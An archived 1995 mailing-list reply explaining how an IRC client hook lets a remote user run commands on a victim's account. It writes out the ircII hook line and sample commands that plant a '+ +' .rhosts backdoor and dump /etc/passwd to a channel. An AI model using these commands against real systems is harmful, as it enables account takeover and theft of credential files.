Re: IRC Security Loophole

[lwells () netcom com (Kernel Panic)]

On Fri, 3 Feb 1995, Silicon Avatar wrote:

> On Fri, 3 Feb 1995, Lorna Leong wrote:
>
> > Hi,
> >
> > I read somewhere that there is a security loophole in IRC. I don't know 
> > anything else about it but I would like to find out more information 
> > about this. I heard that information about this IRC loophole can be found 
> > by FTP at ftp.cert.org, but I couldn't find anything relevant there.
>
> If you are talking about the "jupe" or "grok" hole.  It was temporary, and
> merely hacked version of the client floating around at "trusted" sites.
>
> To my knowledge, these "hacks" have been removed and are no longer a threat
> (unless someone is propogating these older clients.)
>
> Simply put, you could "CTCP grok [command]" (CTCP being a method of
> communication over IRC) someone, and have that command executed,
> unknowingly, off the account.

No, IRC holes are a more serious threat than you give then credit for. 
For example, if I were to add to a script (or better yet make someone 
type) the following:

/on ^ctcp "% % JUPE" $3-

They would be just as much in my control as if they were on a hacked client.
from this, you can do:

/ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts

or

/ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd

Theres more to IRC backdoors than making people say stupid stuff on a 
channel. I hope this example clears that up a little.



/dev/kmem


-
This sig deleted for brevity
-